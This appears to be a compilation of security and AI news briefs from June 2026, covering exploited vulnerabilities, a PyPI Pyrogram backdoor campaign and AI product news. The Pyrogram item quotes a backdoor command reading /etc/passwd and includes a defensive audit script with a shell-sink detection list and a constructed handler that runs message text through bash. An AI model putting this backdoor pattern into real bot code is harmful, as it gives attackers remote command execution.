CISA flags Microsoft Defender ‘BlueHammer’ LPE in ransomware use, Oracle EBS takeover exploited, and a PyPI Pyrogram supply-chain backdoor

This brief covers the trailing ~48 hours (June 30 – July 2, 2026). Each item was checked against its primary source — CISA KEV, vendor advisories (Microsoft MSRC, Oracle), SEC filings, and original vendor research — with reputable outlet reporting used for context.

CISA flags Microsoft Defender “BlueHammer” flaw as exploited by ransomware gangs

CISA / Microsoft MSRC · June 30, 2026

CISA updated its Known Exploited Vulnerabilities Catalog to note that ransomware operators are now exploiting CVE-2026-33825 (“BlueHammer”), a high-severity local privilege escalation flaw in Microsoft Defender. The bug was leaked with proof-of-concept code in early April by a researcher known as “Nightmare Eclipse,” patched by Microsoft on April 14, and added to the KEV catalog on April 22 after zero-day exploitation. It lets a local attacker reach the SAM database and escalate to SYSTEM. Status: patched, actively exploited, in KEV (now flagged for ransomware use); Microsoft has not yet tagged it as exploited in its advisory.

“Insufficient granularity of access control in Microsoft Defender allows an authorized attacker to elevate privileges locally.” — Microsoft Security Response Center advisory

Source: Microsoft MSRC advisory · CISA KEV entry · BleepingComputer

“Operation Navy Ghost”: trojanized Pyrogram forks backdoor Telegram-bot developers on PyPI

Checkmarx · June 30, 2026

Checkmarx disclosed a supply-chain campaign, active since November 2025, in which at least eight malicious forks of the popular (but unmaintained) Pyrogram Telegram framework were published to PyPI — including pyrogram-styled, VLifeGram, and pyrogram-navy. Each embeds a hidden secret.py backdoor that registers covert Telegram command handlers, letting the operator run arbitrary Python or shell commands on the bot’s server. No CVE is assigned. Developers who installed any listed package should remove it, rotate all server credentials, and revoke Telegram bot tokens.

“When the attacker sends /asi cat /etc/passwd, this runs /bin/bash -c ‘cat /etc/passwd’ on the victim’s server and returns the output. This is repeatable with any shell command and runs under the infected application’s authority.” — Checkmarx

Source: Checkmarx research · BleepingComputer
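A defender-side audit for the backdoor pattern described above, as an added example that is not Checkmarx's tooling and not part of the Pyrogram project: it parses bot source with Python's `ast` module, finds functions registered through Pyrogram's `on_message` decorator, and flags any whose body reaches a shell or exec call. The two sample sources are constructed; the Pyrogram decorator and `filters.command` names are real, while the handler names and the `["asi", "run"]` binding are assumptions.

```python
import ast
from dataclasses import dataclass

# Calls that hand message text to a shell or to the Python interpreter.
SHELL_SINKS = {("subprocess", "run"), ("subprocess", "Popen"), ("subprocess", "call"),
               ("subprocess", "check_output"), ("os", "system"), ("os", "popen"),
               ("asyncio", "create_subprocess_shell"), ("asyncio", "create_subprocess_exec")}
EXEC_BUILTINS = {"exec", "eval"}

@dataclass
class Finding:
    handler: str    # name of the decorated handler function
    commands: list  # bot commands bound via filters.command(...); may be empty
    sinks: list     # dotted names of the dangerous calls it makes

def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def _handler_commands(func):
    """Command names from filters.command(...) inside @<x>.on_message(...); None if not a handler."""
    cmds = None
    for dec in func.decorator_list:
        if not isinstance(dec, ast.Call) or not (_dotted(dec.func) or "").endswith(".on_message"):
            continue
        cmds = []
        for sub in ast.walk(dec):
            if isinstance(sub, ast.Call) and (_dotted(sub.func) or "").endswith(".command"):
                for arg in sub.args:
                    if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                        cmds.append(arg.value)
                    elif isinstance(arg, (ast.List, ast.Tuple)):
                        cmds.extend(e.value for e in arg.elts if isinstance(e, ast.Constant))
    return cmds

def _sinks_in(func):
    """Dotted names of every shell/exec call anywhere inside the function body."""
    found = []
    for sub in ast.walk(func):
        if isinstance(sub, ast.Call):
            name = _dotted(sub.func)
            if name and (name in EXEC_BUILTINS or tuple(name.rsplit(".", 1)) in SHELL_SINKS):
                found.append(name)
    return found

def audit_source(src: str) -> list:
    """Return a Finding for each Telegram handler that reaches a shell/exec sink."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            cmds = _handler_commands(node)
            sinks = _sinks_in(node) if cmds is not None else []
            if sinks:
                findings.append(Finding(node.name, cmds, sinks))
    return findings

# Constructed samples: a normal /start handler, and one shaped like the hidden handler Checkmarx describes.
BENIGN = '''
@Client.on_message(filters.command("start"))
async def start(client, message):
    await message.reply_text("Hello!")
'''
SUSPECT = '''
@Client.on_message(filters.command(["asi", "run"]))
async def _h(client, message):
    out = subprocess.run(["/bin/bash", "-c", message.text.split(" ", 1)[1]], capture_output=True, text=True)
    await message.reply_text(out.stdout)
'''
```

Run `audit_source` over every `.py` file of an installed package (including any `secret.py`); handlers bound to non-command filters are checked too, so a finding with an empty `commands` list still deserves a look.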

Aflac discloses breach of its Japan subsidiary exposing policy, personal, and bank data

Aflac Incorporated (SEC 8-K) · June 30, 2026

In an SEC filing, Aflac reported that an unauthorized third party accessed systems at its wholly owned subsidiary Aflac Japan between June 15 and June 25, 2026, when the intrusion was discovered. Impacted files include policy and coverage details, personal information, and bank account information. Aflac says the incident is limited to Japan and did not affect its U.S. systems; the full scope remains under investigation. This is a separate incident from the Scattered Spider–linked breach Aflac disclosed a year earlier.

“Aflac Japan has determined that certain impacted files contain policy and coverage details, personal information, and bank account information … This incident is limited to systems in Japan.” — Aflac Incorporated, SEC Form 8-K

Source: SEC 8-K filing · BleepingComputer

Still developing

Critical Oracle E-Business Suite flaw now exploited in the wild

Oracle / Defused · June 29, 2026

Threat intelligence firm Defused reported active exploitation of CVE-2026-46817 (CVSS 9.8), an unauthenticated remote-takeover flaw in the File Transmission component of Oracle Payments within Oracle E-Business Suite. Oracle patched it in the May 2026 Critical Patch Update. It is not yet listed in CISA KEV; Shadowserver tracks over 450 EBS instances exposed online.

“CVE-2026-46817 (CVSS 9.8 unauth HTTP takeover in Oracle E-Business) is being exploited. Over the weekend, we observed an actor exploiting the vulnerability on our Oracle E-Business honeypots. This vulnerability has no known previous exploitation and no public POC code exists.” — Defused

Source: Oracle May 2026 CPU · NVD · BleepingComputer

SimpleHelp authentication-bypass flaw exploited to drop new “Djinn Stealer”

Horizon3.ai / Blackpoint · June 29, 2026

Attackers are exploiting CVE-2026-48558, a critical authentication-bypass vulnerability in SimpleHelp remote-management software (in OIDC configurations), to create privileged technician sessions. In an intrusion investigated by Blackpoint, the actor deployed a new loader (“TaskWeaver”) and a previously undocumented cross-platform infostealer (“Djinn Stealer”) that targets developer, cloud, and AI-tooling credentials. Around 1,000 vulnerable SimpleHelp servers were exposed at disclosure. Status: actively exploited; patch available.

“The compromised RMM platform provided the operator with a trusted administrative channel capable of transferring files and executing commands on systems managed through the server.” — Blackpoint

Source: Blackpoint research · BleepingComputer



HP Scales Its OpenAI Frontier Partnership and California Adopts Claude Statewide

This brief covers the trailing ~72 hours (June 27–30, 2026). Every item below was confirmed on the originating organization’s own page, with a published date inside the window. It was a quiet stretch for model launches, led instead by two notable enterprise and government adoption moves — HP scaling its OpenAI partnership and California signing a statewide Anthropic deal.

HP Inc. scales its OpenAI Frontier strategic partnership

OpenAI · June 28, 2026

OpenAI said HP Inc. will scale activation of its OpenAI Frontier strategic partnership after a series of successful pilots, moving from experiments to enterprise-wide deployment. The work spans customer- and partner-facing experiences, customer telemetry insights, employee productivity, and software development, with Frontier serving as the connective layer that governs access, context, deployment, and evaluation across HP’s agents and AI workflows. OpenAI cited early proof points, including one engineer moving through 122 pull requests across 43 projects in weeks and a security team estimating roughly 82 hours/week of capacity unlocked.

“It has been an amazing tool, and I am using it daily.” — an HP engineer, quoted by OpenAI

Source: HP Inc. launches Frontier strategic partnership with OpenAI

California adopts Claude statewide in a first-of-its-kind Anthropic partnership

State of California · June 29, 2026

Governor Gavin Newsom announced that California has entered a partnership with Anthropic giving all state agencies — plus cities and counties — access to Claude at a 50% discount, bundled with free workforce training and GenAI technical assistance. Claude becomes the first AI productivity tool offered through the California Department of Technology’s new Statewide Information Technology Shared Services (SITeS) portal. The state noted existing Claude use at the DMV (customer service and wait times), the Department of Health Care Services, and CDT/CalOES cyber defense work using Claude Security and Claude Code.

“AI should not replace the human work of government; it should help our workers move faster, solve problems more effectively, and deliver better results for Californians.” — Governor Gavin Newsom

Source: Governor Newsom announces a first-of-its-kind partnership providing Anthropic tools to state agencies

Still developing

Ornith-1.0 · DeepReinforce · June 25, 2026 — Just ahead of this window, DeepReinforce released Ornith-1.0, an MIT-licensed open-weights family for agentic coding (9B and 31B Dense, 35B and 397B MoE) built on pretrained Gemma 4 and Qwen 3.5. Its distinguishing feature is a self-scaffolding training framework in which the model learns to author both solution rollouts and the task-specific harnesses that guide them. DeepReinforce reports the 397B flagship scores 77.5 on Terminal-Bench 2.1 and 82.4 on SWE-Bench Verified, matching Claude Opus 4.7. Source: Ornith-1.0: Self-Scaffolding LLMs for Agentic Coding.



CISA Flags Exploited Cisco CUCM SSRF and PTC Windchill RCE; JFrog Releases DirtyClone Linux Root Exploit

This brief covers cyber/InfoSec developments from the trailing ~48 hours (June 25–27, 2026). Every item below was confirmed against its primary advisory or the CISA KEV catalog, and only items with a primary-source disclosure inside the window are included.

CISA adds actively exploited Cisco Unified CM SSRF flaw (CVE-2026-20230) to KEV

Cisco · June 25, 2026

CISA added CVE-2026-20230 to its Known Exploited Vulnerabilities catalog on June 25, 2026, with a June 28 remediation deadline for federal agencies. The flaw is a server-side request forgery (CWE-918) vulnerability in Cisco Unified Communications Manager and Unified CM SME, carrying a CVSS 3.1 base score of 8.6 and a Cisco Security Impact Rating of Critical. An unauthenticated, remote attacker can send a crafted HTTP request to write files to the underlying OS and later escalate to root; exploitation requires the WebDialer service, which is disabled by default. Cisco first published the advisory on June 3 and has released fixed software (14SU6, 15SU5/COP1); public PoC code exists and outlets reported in-the-wild exploitation over the weekend prior to the KEV listing.

“A successful exploit could allow the attacker to write files to the underlying operating system that could be used later to elevate to root.” — Cisco Security Advisory cisco-sa-cucm-ssrf-cXPnHcW

Source: Cisco advisory · CISA KEV alert · BleepingComputer

PTC Windchill / FlexPLM RCE (CVE-2026-12569) added to KEV as web-shell attacks continue

PTC · June 25, 2026

CISA also added CVE-2026-12569 to the KEV catalog on June 25, 2026, with a June 28 deadline. The vulnerability is a critical remote code execution flaw (reported CVSS 9.3) in PTC’s Windchill PDMLink and FlexPLM product lifecycle management software, exploitable by an unauthenticated, remote attacker via deserialization/improper input validation. Attackers are dropping persistent JSP web shells (named with 16 hex characters under the Windchill login directory) for remote command execution and data exfiltration. PTC began releasing version-specific patches on June 17 and, in a June 25 update, published new indicators of compromise amid escalating activity. Given Windchill’s deployment across automotive, aerospace, defense, and manufacturing, the flaw poses a notable supply-chain risk.

“Over the last several hours, we’ve received continued reports of heightened threat activity. We urge you to apply all patches and remediations immediately.” — PTC Trust Center advisory, June 25, 2026 update

Source: PTC advisory · CISA KEV alert · The Hacker News

JFrog publishes working “DirtyClone” Linux kernel root exploit (CVE-2026-43503)

JFrog Security Research · June 25, 2026

JFrog Security Research published a full exploit walkthrough on June 25, 2026 for CVE-2026-43503, a high-severity (CVSS 8.8) local privilege escalation in the Linux kernel they dubbed “DirtyClone,” the first public demonstration for this DirtyFrag-family variant. The bug lives in the XFRM/IPsec path: cloning via __pskb_copy_fclone() drops the SKBFL_SHARED_FRAG safety flag, letting in-place IPsec decryption overwrite file-backed page-cache memory (e.g., patching /usr/bin/su in RAM) to gain root. Any local user able to acquire CAP_NET_ADMIN—often via unprivileged user namespaces—can exploit it, making multi-tenant cloud, Kubernetes, and container hosts the highest-risk environments. The fix was merged to mainline on May 21 (v7.1-rc5); Debian, Ubuntu, and Fedora are confirmed affected absent the full patch chain. No in-the-wild exploitation has been reported.

“The severity of this issue is significant because it allows any unprivileged local user to gain root access (LPE) by manipulating the Linux page cache. The attack is silent, leaves no kernel logs or audit traces, and bypasses common on-disk integrity monitoring tools.” — JFrog Security Research

Source: JFrog Security Research · CVE.org



OpenAI Previews the GPT-5.6 Family (Sol, Terra, Luna) and Grok Integrates With Interactive Brokers

This brief covers the trailing ~72 hours (June 25–28, 2026). Every item below was confirmed on the originating organization’s own page, with a published date inside the window. It was a quieter stretch than last week, led by OpenAI’s next-generation model preview and a notable new finance integration from xAI.

OpenAI previews the GPT-5.6 family: Sol, Terra, and Luna

OpenAI · June 26, 2026

OpenAI began a limited preview of a new model generation: GPT-5.6 Sol (its flagship), Terra (a balanced everyday model OpenAI says matches GPT-5.5 at 2x lower cost), and Luna (its fastest, most affordable tier). The release pairs stronger coding, biology, and cybersecurity capabilities with what OpenAI calls its most robust safety stack to date, including a new max reasoning effort and an ultra mode that uses subagents. Notably, the rollout is gated: at the U.S. government’s request, the models are starting with a small group of trusted partners via the API and Codex before broader availability, and are not in ChatGPT during the preview. Pricing runs from Luna at $1/$6 per million input/output tokens up to Sol at $5/$30.

“We don’t believe this kind of government access process should become the long-term default. It keeps the best tools from users, developers, enterprises, cyber defenders, and global partners who need them.” — OpenAI

Source: Previewing GPT-5.6 Sol: a next-generation model

Grok integrates with Interactive Brokers

xAI · June 25, 2026

xAI announced that Interactive Brokers now integrates with Grok, letting clients link an existing IBKR account to Grok at no cost and without opening a new account. Once connected, users can ask Grok to analyze their portfolio, run scenario models for sector and regional exposure, research market trends, and build trading strategies that generate order instructions in real time. The integration is set up through a connector inside Grok that redirects to Interactive Brokers’ login for authorization.

“From portfolio analysis to order instructions, these tools unify data, insight, and action so you can move from idea to decision instantly.” — xAI

Source: Explore the markets with Interactive Brokers and Grok

Still developing

Mistral OCR 4 · Mistral AI · June 23, 2026 — Just ahead of this window, Mistral released OCR 4, its latest document-intelligence model, adding bounding boxes, block classification, and inline confidence scores alongside extracted text, with support for 170 languages and single-container self-hosting. Source: Introducing Mistral OCR 4.



Exploited Ubiquiti UniFi OS and Lantronix Flaws Hit CISA KEV; Cisco CUCM and SD-WAN Bugs Under Active Attack

This brief covers the trailing ~48 hours (June 24–26, 2026). Every item below was verified against its primary source — CISA KEV alerts, vendor advisories, and original vendor research — with disclosure or exploitation activity confirmed inside the window.

Ubiquiti UniFi OS unauthenticated RCE chain exploited as zero-days, added to CISA KEV

CISA / Ubiquiti · June 23, 2026

CISA added three maximum-severity Ubiquiti UniFi OS flaws to its Known Exploited Vulnerabilities catalog: CVE-2026-34908 (improper access control, CVSS 10.0), CVE-2026-34909 (path traversal), and CVE-2026-34910 (improper input validation/command injection, CVSS 10.0). Chained together, they give a remote, unauthenticated, network-adjacent attacker code execution on UniFi OS devices. Ubiquiti shipped fixes in UniFi OS Server 5.0.8 on May 21 without acknowledging in-the-wild abuse, but users reported attacks that created rogue administrator accounts under the username “John Sim,” and BishopFox published an analysis of the unauthenticated RCE chain. CISA ordered federal agencies to patch by June 26 under BOD 26-04.

“We confirmed the bypass against a live [UniFi OS version] 5.0.6 virtual machine. Requests built this way reached internal backends that are supposed to require authentication.” — BishopFox

Source: CISA KEV alert; Ubiquiti Security Advisory Bulletin 064; BishopFox analysis; SecurityWeek

Lantronix EDS5000 command injection added to CISA KEV alongside the Ubiquiti flaws

CISA / Lantronix · June 23, 2026

CISA added CVE-2025-67038 (CVSS 9.8), an unauthenticated OS command-injection flaw in the Lantronix EDS5000 serial-to-IP converter, to the KEV catalog in the same update. The HTTP RPC module fails to sanitize the username parameter before concatenating it into a shell command used to log failed authentication attempts, allowing arbitrary OS commands to run with root privileges. The bug was originally disclosed in April as part of the BRIDGE:BREAK set of Lantronix and Silex vulnerabilities affecting OT and healthcare environments; it now carries the same June 26 federal patch deadline.

Source: CISA KEV alert; CVE.org record; SecurityWeek

Cisco Unified CM WebDialer SSRF (CVE-2026-20230) seen exploited in the wild

Cisco / Defused Cyber · June 24, 2026

Researchers reported active exploitation of CVE-2026-20230 (CVSS 8.6), an unauthenticated server-side request forgery flaw in Cisco Unified Communications Manager that can be used to write files and ultimately escalate to root. Cisco previously rated the issue Critical and confirmed public proof-of-concept code; exploitation is only possible where the WebDialer service is enabled, which is off by default. Cisco PSIRT had not confirmed in-the-wild abuse, and the flaw was not yet listed in CISA KEV at the time of reporting. Cisco recommends disabling WebDialer until patches (14SU6, 15SU5/COP1) are applied.

“Over the weekend we observed exploitation of CVE-2026-20230 – Cisco Unified CM (CUCM) WebDialer SSRF → root file-write (CVSS 8.6)… This is currently being exploited from a single source using an unvetted PoC, with genuinely-formatted file:// file-write payloads landing on our decoys.” — Defused (@DefusedCyber)

Source: Cisco advisory; Security Affairs

Mandiant: Cisco Catalyst SD-WAN zero-day (CVE-2026-20245) exploited months before disclosure

Google Mandiant / Cisco · June 25, 2026

Mandiant disclosed that an unknown threat actor exploited CVE-2026-20245 (CVSS 7.8) in Cisco Catalyst SD-WAN Manager as a zero-day at least two months before it was publicly disclosed. The flaw lets an authenticated attacker with netadmin privileges run arbitrary commands as root via a crafted file upload; attackers chained it with earlier authentication-bypass bugs (CVE-2026-20127, CVE-2026-20182) to reach netadmin in the first place. Mandiant observed intrusions against a communications service provider between late 2025 and March 2026, including creation of a rogue “troot” root account and extensive anti-forensic cleanup. Cisco has confirmed active exploitation and released fixes.

“In early 2026, Mandiant identified a threat actor targeting SD-WAN infrastructure at a service provider. After gaining initial access, the threat actor exploited a zero-day vulnerability (CVE-2026-20245) in Cisco Catalyst SD-WAN to escalate privileges from a compromised administrative account to root-level access.” — Mandiant

Source: Mandiant report; Cisco advisory; Security Affairs



OpenAI and Broadcom Unveil the ‘Jalapeño’ Inference Chip, Anthropic Launches Claude Tag for Slack, and New Data on Codex Taking Over Knowledge Work

This brief covers the trailing ~72 hours (June 23–26, 2026). Every item below was confirmed on the originating organization’s own page, with a published date inside the window. It was a busy stretch led by OpenAI — a custom inference chip, a new economic-research paper, and a science case study — alongside Anthropic shipping a new way to work with Claude.

OpenAI and Broadcom unveil “Jalapeño,” a custom LLM inference chip

OpenAI · June 24, 2026

OpenAI and Broadcom unveiled Jalapeño, OpenAI’s first Intelligence Processor: an accelerator designed from scratch for LLM inference and the first chip in a multi-generation compute platform the two companies are building together. OpenAI says the program went from initial design to manufacturing tape-out in nine months — what it believes is the fastest ASIC development cycle ever for a high-performance advanced semiconductor — with parts of the design accelerated by OpenAI’s own models. Engineering samples are already running ML workloads in the lab, and the platform is targeted for initial deployment at gigawatt scale by the end of 2026.

“Jalapeño is part of our long-term full-stack infrastructure strategy to make compute more abundant, resulting in AI which is faster, more reliable, more affordable for people and businesses, and can be used to solve more important problems.” — Greg Brockman, President and Co-Founder, OpenAI

Source: OpenAI and Broadcom unveil LLM-optimized inference chip

Anthropic introduces Claude Tag, starting on Slack

Anthropic · June 23, 2026

Anthropic launched Claude Tag, a way for teams to delegate work to Claude as a member of a Slack channel. Anyone in a channel can tag @Claude to hand off a task, and the model builds context over time, takes initiative when “ambient” behavior is enabled, and can work asynchronously over hours or days with tightly scoped, admin-controlled access to tools and data. It runs on Opus 4.8, is available today in beta for Claude Enterprise and Team customers, and replaces the existing Claude in Slack app.

“Tagging @Claude is now one of the main ways we get things done at Anthropic. Today, 65% of our product team’s code is created by our internal version of Claude Tag.” — Anthropic

Source: Introducing Claude Tag

OpenAI publishes economic-research paper on Codex adoption

OpenAI · June 25, 2026

OpenAI released an Economic Research paper, “The shift to agentic AI: evidence from Codex,” documenting how agentic tools are changing knowledge work. The company reports that by May 2026, 80.6% of sampled individual Codex users made at least one request estimated to exceed 30 minutes of human work and 25.6% made one estimated to exceed eight hours. Internally, Codex has become the primary AI tool for every department — including Legal, Finance, and Recruiting — and non-developer adoption grew 137x among individual users since August 2025.

“As the tools improve, people use them for longer, more complex, and more cross-functional work. As time goes on, this is likely to be what the future of work looks like.” — OpenAI

Source: How agents are transforming work

OpenAI details how GPT-5 helped solve a 3-year-old immunology mystery

OpenAI · June 23, 2026

OpenAI published a case study on immunologist Derya Unutmaz of The Jackson Laboratory, who used GPT-5 Pro to revisit a shelved 2022 experiment on how glucose shapes T-cell development. The model proposed a mechanism — that deoxyglucose interferes with the protein IL-2, removing a barrier to T cells becoming inflammatory Th17 cells — and, in a separate test, correctly predicted the result of an unpublished experiment on lymphoma-killing CD8+ cells. OpenAI notes that subject-matter expertise remains essential to judge the significance of any AI-generated insight.

“GPT-5 came up with this really remarkable insight that retrospectively, makes perfect sense.” — Dr. Derya Unutmaz, The Jackson Laboratory and the University of Connecticut

Source: How GPT-5 helped immunologist Derya Unutmaz solve a 3-year-old mystery

